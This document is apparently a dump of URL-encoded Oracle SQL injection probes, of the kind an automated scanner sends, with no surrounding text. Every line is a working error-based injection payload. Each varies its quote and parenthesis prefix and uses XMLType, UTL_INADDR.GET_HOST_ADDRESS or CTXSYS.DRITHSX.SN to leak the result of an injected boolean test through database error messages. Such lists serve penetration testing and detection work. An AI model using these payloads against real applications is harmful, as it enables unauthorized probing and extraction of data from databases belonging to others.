-9925%00%27%29%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%28%27Ddbd%27%3D%27Ddbd -9550%00%27%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20AND%20%27VZjg%27%3D%27VZjg -3396%27%29%20WHERE%205020%3D5020%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -2455%22%29%20WHERE%207845%3D7845%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -7351%27%20WHERE%202475%3D2475%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -5970%22%20WHERE%208654%3D8654%20OR%202267%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282267%3D2267%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29%20--%20 -3987%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -9689%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%283898%3D3898 -5053%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%281166%3D1166 -5528%29%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%286219%3D6219 -2861%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -3915%29%20WHERE%202166%3D2166%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -2486%20WHERE%202118%3D2118%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -2659%27%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -5043%27%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -8980%22%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29 -4557%27%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27EDsq%27%3D%27EDsq -8941%27%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27suIf%27%3D%27suIf -5350%27%29%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27ufzU%27%3D%27ufzU -8390%27%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27Lpjp%27%3D%27Lpjp -3168%27%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27yqNs%27%20LIKE%20%27yqNs -4805%27%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27gQQN%27%20LIKE%20%27gQQN -8610%27%29%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27PEUJ%27%20LIKE%20%27PEUJ -3320%27%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27zwbG%27%20LIKE%20%27zwbG -6811%22%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%22KlEJ%22%3D%22KlEJ -2630%22%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22Bnwn%22%3D%22Bnwn -4578%22%29%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22ROxN%22%3D%22ROxN -4356%22%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%22lPLz%22%3D%22lPLz -3291%22%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%22iFyC%22%20LIKE%20%22iFyC -9429%22%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%22qKIj%22%20LIKE%20%22qKIj -6116%22%29%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%22BnpS%22%20LIKE%20%22BnpS -5681%22%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%22HTwR%22%20LIKE%20%22HTwR -3774%25%27%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27%25%27%3D%27 -7244%25%27%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%27%25%27%3D%27 -7639%25%27%29%29%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%28%28%27%25%27%3D%27 -8571%25%27%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27%25%27%3D%27 -1554%00%27%29%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%28%27eyPu%27%3D%27eyPu -8095%00%27%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20AND%20%27MeAw%27%3D%27MeAw -3216%27%29%20WHERE%203991%3D3991%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -1214%22%29%20WHERE%209393%3D9393%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -8701%27%20WHERE%201638%3D1638%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -4425%22%20WHERE%209010%3D9010%20OR%203947%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%283947%3D3947%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%20--%20 -7789%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -4226%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%289603%3D9603 -7198%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%287729%3D7729 -4578%29%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%284446%3D4446 -7913%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -6773%29%20WHERE%208526%3D8526%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -7135%20WHERE%205694%3D5694%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20--%20 -6006%27%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -5833%27%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -9713%22%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29 -2363%27%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%27CLTY%27%3D%27CLTY -9181%27%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%27xgOz%27%3D%27xgOz -9506%27%29%29%29%20OR%202322%3DCTXSYS.DRITHSX.SN%282322%2C%28CHR%2858%29%7C%7CCHR%28110%29%7C%7CCHR%28115%29%7C%7CCHR%28107%29%7C%7CCHR%2858%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%282322%3D2322%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%2858%29%7C%7CCHR%2898%29%7C%7CCHR%28112%29%7C%7CCHR%28121%29%7C%7CCHR%2858%29%29%29%20AND%20%28%28%28%27iFkP%27%3D%27iFkP 